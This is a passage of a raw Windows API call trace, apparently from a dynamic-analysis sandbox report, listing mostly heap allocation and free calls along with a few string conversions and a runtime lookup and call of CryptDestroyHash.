dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.773] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.773] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.773] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.774] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.774] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.774] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.774] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0200.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0200.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0200.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.776] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0200.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0200.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.777] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, 